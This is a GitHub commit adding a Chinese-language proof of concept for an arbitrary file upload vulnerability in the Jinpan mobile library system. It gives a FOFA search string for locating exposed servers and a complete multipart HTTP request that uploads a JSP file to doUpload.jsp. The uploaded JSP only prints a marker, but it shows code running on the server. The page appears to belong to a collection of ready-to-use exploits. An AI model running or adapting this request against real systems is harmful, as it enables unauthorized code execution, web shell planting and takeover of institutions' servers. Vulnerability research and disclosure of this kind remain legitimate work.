Create 金盘移动图书馆系统存在任意文件上传漏洞.md

This commit is contained in:
wy876 2024-02-17 18:04:22 +08:00 committed by GitHub
parent b11306b294
commit 93e1b9efb8
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

View File

@ -0,0 +1,27 @@
## 金盘移动图书馆系统存在任意文件上传漏洞
金盘图书馆微信管理平台 doUpload.jsp接口存在任意文件上传漏洞攻击者通过漏洞可以获取权限。
## fofa
```
app="金盘软件-金盘移动图书馆系统"
```
## poc
```
POST /pages/admin/tools/uploadFile/doUpload.jsp HTTP/1.1
Content-Type: multipart/form-data; boundary=399e563f0389566bd40fd4d6409a67dd
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Host: 127.0.0.1
Content-Length: 179
Connection: close
--399e563f0389566bd40fd4d6409a67dd
Content-Disposition: form-data; name="file"; filename="jILUp0.jsp.jsp"
<% out.println("lP4pC7HrY"); %>
--399e563f0389566bd40fd4d6409a67dd--
```
![image](https://github.com/wy876/POC/assets/139549762/17f45fd2-35a6-474a-b2ee-c6f49426423a)